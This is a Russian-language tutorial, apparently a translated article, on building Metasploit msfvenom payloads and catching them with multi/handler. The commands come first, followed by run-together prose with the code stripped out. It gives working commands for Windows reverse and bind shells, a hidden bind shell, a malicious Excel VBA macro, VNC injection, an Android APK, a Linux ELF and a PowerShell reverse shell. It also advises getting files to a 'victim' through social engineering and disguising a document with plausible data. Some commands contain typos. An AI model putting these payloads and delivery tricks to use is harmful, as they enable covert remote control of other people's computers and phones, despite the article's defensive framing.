Предварительные требования

Lhost — IP-адрес компьютера, на котором установлена Kali, то есть — нашей рабочей машины.



Lport — порт, который назначен серверу — программе, которая «слушает» сеть и ожидает подключения от клиента.



P — сокращение от «payload», пэйлоад для выбранной платформы



F — ключ, задающий тип файла, например, exe для Windows, apk для Android, и так далее.



msfvenom

Организация Bind Shell-подключения

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

/root/Desktop/bind.exe

msfconsole

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/bind_tcp msf exploit(handler) > set rhost IP 192.168.0.100 msf exploit(handler) > set lport 4444 msf exploit(handler) > exploit

bind_tcp

Организация Reverse Shell-подключения

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe.

lhost

lport

msfconsole

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost IP 192.168.0.107 msf exploit(handler) > set lport 5555 msf exploit(handler) > exploit

meterpreter

Организация Reverse HTTPS-подключения

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe

msfconsole

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_https msf exploit(handler) > set lhost IP 192.168.0.107 msf exploit(handler) > set lport 443 msf exploit(handler) > exploit

Скрытое Bind Shell-подключение

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe

nc 192.168.0.100 1010

Reverse Shell-подключение с помощью Netcat

shell_reverse_tcp

msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe

netcat

nc -lvp 1111

Пэйлоады-макросы на VBA

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba

#if vba 7

End if

Alt+F11

Create

This Workbook

Test

msfconsole

msf > use exploit/multi/handler msf exploit(handler) > set paylaod windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost=192.168.0.107 msf exploit(handler) > set lport= 7777 msf exploit(handler) > exploit

VNC-пэйлоад

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe

msfconsole

msf exploit(handler) > use exploit/multi/handler msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp msf exploit(handler) > set lhost 192.168.0.107 msf exploit(handler) > set lport= 5900 msf exploit(handler) > exploit

Пэйлоад для Android

msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk

msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.0.107 msf exploit(handler) > set lport 8888 msf exploit(handler) > exploit

Пэйлоад для Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell

msf > use exploit/multi/handler msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.0.107 msf exploit(handler) > set lhost 4444 msf exploit(handler) > run

Пэйлоад для PowerShell

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat

msf > use multi/handler msf exploit(handler) > set payload cmd/windows/reverse_powershell msf exploit(handler) > set lhost 192.168.0.107 msf exploit(handler) > set lport 4444 msf exploit(handler) > run

Итоги

«Голова — лучший антивирус», — эта идея никогда не потеряет актуальности. Для того, чтобы эффективно бороться с компьютерными угрозами, надо знать своих врагов. Среди таких врагов — программы, которые позволяют незаметно подключаться к компьютеру и выполнять с ним некие действия, проще говоря, софт для взлома систем. Полагаем, знание того, как создают подобный софт, хотя бы на базовом уровне, понимание того, как он работает, полезно любому, кого волнуют вопросы компьютерной безопасности. Кроме того, такой софт можно использовать для проверки защищённости собственных систем.Поэтому сегодня мы решили поделиться с вами переводом материала, автор которого рассказывает о том, как создавать и применять пэйлоады, или полезные нагрузки, предназначенные для удалённого управления различными системами, в частности — Windows, Linux и Android, с использованием msfvenom — инструмента командной строки из пакета Metasploit. Сразу хочется отметить, что к тому, что вы узнаете ниже, стоит относиться с осторожностью, помня о том, что несанкционированное проникновение в чужие системы — это неэтично и незаконно.Для того, чтобы попробовать то, о чём пойдёт речь, на практике, вам понадобится компьютер с установленной на нём Kali Linux, компьютеры под управлением Windows и Linux, Android-смартфон. В процессе работы, при составлении команд, мы будем пользоваться следующими ключами:В терминале Kali введём команду. Результаты её работы показаны ниже. А именно, будет выведен список всех доступных опций для создания пэйлоадов. Тут мы рассмотрим лишь некоторые из них.Bind shell — это схема взаимодействия с удалённой консолью, при которой на целевом компьютере запускается сервис, к которому может подключиться атакующий. Фактически, речь идёт о прямом подключении к атакуемому компьютеру. Для того, чтобы создать соответствующий пэйлоад для Windows, нужно выполнить следующую команду в терминале:В результате будет создан exe-файл, который будет сохранён по адресу, указанному при выполнении команды, а именно — это. Полученный файл нужно каким-то образом доставить на компьютер жертвы и выполнить его. Например — воспользоваться методами социальной инженерии или выложить его на сервис обмена файлами.Теперь запустими введём нижеприведённые команды для того, чтобы открыть сессию:После выполнения файла в нашем распоряжении окажется meterpreter-подключение к целевому компьютеру:Использованная здесь опцияполезна в тех случаях, когда мы отключаемся от компьютера жертвы, но он при этом ещё работает. Мы можем выполнить ту же команду и подключиться снова, при этом не нужно, чтобы эксплойт снова запускали на удалённом компьютере.Reverse Shell (или Reverse TCP, или connect-back, или обратное подключение) — это схема взаимодействия с удалённым компьютером, обратная вышеописанной. При её использовании нужно, чтобы атакующий сначала запустил на своей машине сервер, при этом целевая машина будет играть роль клиента, который подключается к этому серверу, после чего атакующий получает доступ к оболочке целевого компьютера.Для того, чтобы создать соответствующую полезную нагрузку, нужно ввести в терминале Kali следующую команду:В данном случае мы включаем в команду некоторые новые параметры, такие, как(локальный хост),(локальный порт) для того, чтобы принять обратное соединение от компьютера жертвы.После того, как пэйлоад создан, отправлен на атакуемый компьютер и выполнен там, мы переходим ко второму шагу атаки. Запустими введём следующие команды для того, чтобы организовать подключение удалённого компьютера к нашей машине.На нижеприведённом рисунке видно, что после того, как жертва запустит пэйлоад, выполняется обратное подключение к нашему компьютеру и у нас оказывается сессияОбратите внимание на то, что обе вышеописанные атаки осуществимы в том случаем, если на машине жертвы имеются подходящие работающие порты. Сейчас мы попытаемся найти выход из ситуации, когда на интересующем нас компьютере порты заблокированы. В подобном случае можно сориентироваться в ситуации и создать пэйлоад, например, воспользовавшись портом 443 для HTTPS. Для этого нужно ввести в терминале Kali следующую команду:После создания пэйлоада и отправки его жертве, которая, как ожидается, рано или поздно запустит соответствующий файл, мы переходим к следующему шагу. Запускаеми вводим следующие команды для организации подключения:Как видно на следующем рисунке, после того, как пэйлоад будет запущен на целевом компьютере, происходит обратное подключение к нашему компьютеру и мы можем пользоваться возможностями сессии meterpreter.Исследуем ещё одну возможность msfvenom и попытаемся с её помощью обрести контроль над удалённым компьютером. В этот раз мы хотим заполучить доступ к командной оболочке, а не к сессии meterpreter.Пэйлоад, который мы создадим нижеприведённой командой, после выполнения, прячется в системе, его нельзя обнаружить сканером портов.После того, как файл готов и отправлен жертве, мы можем перейти к следующему шагу. А именно, воспользуемся Netcat, введя в терминале Kali следующую команду:Теперь рассмотрим ещё один подход к использованию пэйлоадов типа, которые позволяют получить доступ к оболочке командной строки атакуемого компьютера. Введём в терминале Kali следующую команду:После создания файла и отправки его на атакуемый компьютер, создадим прослушиватель порта с использованиемПри условии, что наш пэйлоад был успешно выполнен на удалённом компьютере, ниже показано то, как выглядит подключение к нему.Создадим пэйлоад в виде VBA-скрипта, который будем использовать в качестве макроса MS Excel для атаки на целевую машину. Для того, чтобы это сделать, выполним следующую команду в терминале Kali:После выполнения команды, нужно скопировать то, что выделено на рисунке выше, отдо. Далее, откроем файл MS Excel, нажмёмдля вызова окна управления макросами.Тут введём имя макроса и нажмём на кнопку. Макрос мы хотим сохранить в открытой книге, поэтому в соответствующем выпадающем списке надо выбратьПосле этого надо вставить в редакторе VBA ранее скопированный код пэйлоада, закрыть редактор и включить макросы.Теперь можно заполнить Excel-файл какими-нибудь правдоподобно выглядящими данными, в нашем случае — это просто слово, сохранить и отправить жертве. Для организации подключения к удалённому компьютеру нужно открыть терминал Kali, выполнить команду, после чего ввести следующие команды:Когда Excel-файл будет открыт на интересующем нас компьютере, жертве будет предложено включить макросы. После их включения выполнится VBA-скрипт, который создаст обратное подключение к удалённому компьютеру. Выглядеть это будет так, как показано ниже.Хотя и неприлично, без ведома человека, наблюдать за тем, что он делает за компьютером, тот пэйлоад, который мы создадим сейчас, занимается именно этим. Откроем терминал Kali и введём следующую команду:После создания пэйлоада мы, как обычно, отправляем его жертве, после чего начинаем готовиться к подключению. Для этого вызываем в терминале командуи делаем следующее:Тут можно видеть, что выполнена VNC-инъекция, что установлено удалённое соединение. Так же на компьютере под управлением Kali откроется окно Remote Desktop.Взлом мобильных устройств всегда привлекал к себе немалое внимание, поэтому рассмотрим методику создания пэйлоадов для платформы Android. Откроем терминал Kali и введём следующую команду:После подготовки apk-файла его нужно передать на интересующее нас мобильное устройство. Затем нужно подготовиться к подключению на Kali:После того, как пэйлоад будет запущен, в нашем распоряжении будет сессия meterpreter и мы сможем взаимодействовать со взломанным телефоном.Откроем терминал Kali и введём следующую команду:После создания файла его нужно отправить на компьютер жертвы и подготовиться к подключению:После выполнения пэйлоада будет создано обратное TCP-подключение к нашему компьютеру, которое предоставит в наше распоряжение сессию meterpreter.Для того, чтобы создать пэйлоад для PowerShell, откроем терминал Kali и введём следующую команду:Теперь, как обычно, после создания пэйлоада, передадим его на интересующий нас компьютер и подготовимся принять подключение:После запуска пэйлоад создаст обратное подключение к оболочке. Выглядит это так, как показано ниже.Как видите, с использованием msfvenom очень просто создавать программы, предназначенные для удалённого подключения к самым разным системам. То, что это доступно даже пользователям с минимальной подготовкой, придаёт особую актуальность правилу, которое знают все, но далеко не все соблюдают: «Не открывайте файлы, в происхождении которых сомневаетесь».Уважаемые читатели! Известны ли вам случаи взлома систем с использованием пэйлоадов, похожих на те, о которых мы сегодня говорили?